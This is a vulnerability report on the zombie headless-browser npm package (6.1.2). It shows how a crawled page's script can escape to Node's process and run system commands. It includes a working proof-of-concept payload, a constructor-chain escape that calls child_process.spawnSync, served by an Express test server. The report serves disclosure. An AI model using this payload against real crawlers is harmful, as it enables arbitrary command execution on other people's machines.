I would like to report a code injection vulnerability in zombie.
It allows crawled websites to access privileged APIs such as the file system or child process.
module name: zombie
version: 6.1.2
npm page: https://www.npmjs.com/package/zombie
Insanely fast, headless full-stack testing using Node.js
12,671 downloads in the last week
Attackers can insert JS code in their pages that exploit the zombiejs code injection vulnerability. If such pages are crawled using zombiejs the machine running the crawler will run arbitrary commands provided by the attacker. For comparison, jsdom disable script execution by default.
var codeToExec = "var sync=require('child_process').spawnSync; " +
"var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());";
var exploit = "c='constructor';require=this[c][c]('return process')().mainModule.require;" + codeToExec;
var attackVector = "c='constructor';this[c][c](\"" + exploit + "\")()";
// end exploit
var express = require('express');
var app = express();
app.get('/test', function(req, res) {
res.send("<script>" + attackVector + "</script>");
});
app.listen(3000);
const Browser = require('zombie');
// We're going to make requests to http://example.com/signup
// Which will be routed to our test server localhost:3000
Browser.localhost('example.com', 3000);
const browser = new Browser();
browser.visit('/test', function(a,b) {
});
N/A make user aware of this issue and offer a way to disable script execution on untrusted crawled pages.
Analysed webpages can execute privileged commands on the machine running zombiejs. This is especially important if zombiejs is used for building a crawler.